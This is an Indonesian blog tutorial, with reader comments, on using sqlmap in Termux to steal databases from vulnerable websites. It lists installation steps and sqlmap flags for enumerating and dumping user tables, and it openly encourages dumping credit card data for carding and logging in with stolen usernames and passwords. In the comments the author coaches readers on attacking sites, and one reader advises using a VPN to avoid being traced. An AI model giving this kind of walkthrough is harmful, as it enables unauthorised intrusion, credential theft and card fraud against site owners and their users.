CARA MENGGUNAKAN SQLMAP DI TERMUX
Kali Ini Saya Akan Membuat Tutorial SQLMAP Di Termux
SQLMAP adalah tools opensource yang mendeteksi dan melakukan
exoloit pada bug SQL injection secara otomatis. Dengan melakukan seranggan SQL
injection seorang attacker dapat mengambil alih serta memanipulasi sebuah
database di dalam sebuah server.
Maka Dari
itu, kita bisa mencuri atau mengambil database dari sebuah website yang kita
inginkan, tapi harus yang vulnerable ( memiliki celah ) agar bisa di masuki,
karna dari celahnya tersebut kita bisa melihat data – data nya, dan belum pasti
semua data, dan keberuntungan juga di perlukan :v.
Dan jika saja
kita lagi beruntung, kita bisa saja mendapat CC ( Credit Card / kartu kredit )
bagi yang suka carding, bisa dump cc disini hehe..
Baik, Intronya cukup segitu saja, dan mari langsung
menjalankan Tools nya..
~Saya Tidak Bertanggung Jawab
Dengan Kesalahan Yang Anda Lakukan~
Ok.. langsung saja kita Jalankan
Bahan- bahan yang di butuhkan :
~HP Dengan Versi Lolipop Ke Atas ( versi 5.0 + )
~Aplikasi Termux ( Termux hanya bisa di HP Versi
Lolipop Ke Atas )
~Koneksi Internet Lancar
~Kesabaran :V , Soalnya Perlu pengumpulan Database
Nanti, Dan Untuk Cepat Lambat nya, bergantung koneksi internet anda beserta
database website nya hehe.
Yang Pertama :
♠ Buka Aplikasi Termux
~ Kalau sudah, kita update dulu package nya dengan perintah :
$apt update –y
~ Lanjut
dengan Menginstall Python
$apt
install python python2 –y
~ Lanjut
dengan menginstall git agar bisa cloning
$apt install git
~ Sekarang
eksekusi Tool nya
~ Lanjut
masuk ke directory Tool
$cd sqlmap
~ Sekarang
jalankan..
$python2 sqlmap.py
Nahh… Kita Sudah siap Untuk menginstall SQLMAP, skrang tinggal cara
penggunaan. :
Ok, Itu sebagai contoh Untuk kita
masuki database nya..
Ketikkan Perintah Berikut :
Dan tekan Enter..
Kalau vuln, Nanti akan Di tunjukkan nama” Database nya, contoh :
*information_schema
*sdgsd4484sd
Nah itulah contoh database nya, Kita buka database
*sdgsd4488sd
Karena yang information_schema nggak ada gunanya :v
Lanjut untuk membuka, ketik perintah :
Nanti akan di beikan informasi” dalam bentuk table, beserta nama- nama
dalam table nya, tapi belum cukup, kita
harus membuka lebih dalam lagi..
Asgsd4488sd –T users --columns
Untuk memberikan dalam bentuk Kolom Dari Tabel users, maka disitu nanti
akan tertera apa aja yg ada di dalam table nya, tapi biasanya yang ada : email,
phone, username, password, phone
Nah tinggal kita dump untuk mengetahui username dan password nya
Asgsd4488sd –T users –C username,password,phone –dump
Kalau sudah, nanti akan diberikan Username , password, dan nomor hp, jad
itinggal kita masukkan ke website tersebut dan kita sudah bisa memasuki sebagai
user ( pengguna )
·
--dbs = Untuk memberikan Database
·
-D = Nama Database nya
·
-u = URL dari website yang mau di
dump
·
--tables = Untuk memberikan nama – nama table
·
-T = Nama Tabel
·
--columns = Untuk
memberikan data yang ada pada table
·
-C = Nama – nama di dalam kolom
·
--dump = proses akhir untuk mendapatkan username,
password
dan Nomor
Handphone
Baik, Sekian Saja yang dapat saya berikan, Jika ada kesalahan saya mohon
maaf, dan bisa komentar di bawah J.. Kritik Dan Saran sangat di
butuhkan untuk mengembangkan blogspot kita ini.. Wassalam.
#Mr.Dellay
#Adenn
#CYBER|ARMY|TEAM
Hallo bank saya tadi bisa yang di contohin abang tapi saya mau coba link bokep terus ulang di ulang lagi attack nya terus belum keluar database nya knapa yh bang,,,,tolong dong penjelesannya soal nya saya mau musnahin situs forno,,,,,,thnk
ReplyDeleteudah dapat vuln website nya? kalau belum, cari dulu bg terus gunakan. Terima kasih
DeleteGan Passwordnya Hash Jenis Apa ya jadinya??
ReplyDeleteMaksudnya bg?
DeleteGan ko pas saya mau username,password -dump tulisannya unable to read file 'username,password'
ReplyDeleteMungkin, kolom username dan password nya nggk ada di web yang di inject, coba coba web lain. Terima kasih
DeleteGan kalo ada tulisan critical itu apa
ReplyDeleteCoba di ss gan, biar saya periksa.
DeleteGan ada materi deface gak
ReplyDelete[INFO] tried 303/2757 items (11%)
ReplyDeleteitu seperti sedang mendownload, apa emang gitu gan. makasih
Saya pakai web contoh dari abang kok scannya lama, emang gitu yak?
ReplyDeletebang mau tanya ketika kita menjalankan tool ini apa ip dan data kita tertutup oleh alamat palsu, atau gak bang.... karna sistem cyber pasti liat,
ReplyDeleteSemua kemungkinan bisa terjadi sob. Soalnya tak ada system yang aman. Kita cuma berusaha untuk meminimalisir hal tersebut.🙈
DeletePakai VPN mas bro
DeleteThis comment has been removed by the author.
ReplyDeleteGan ada aqua?,aye gans tq hehe
ReplyDeleteWah pada mastah Hem gila emang
ReplyDelete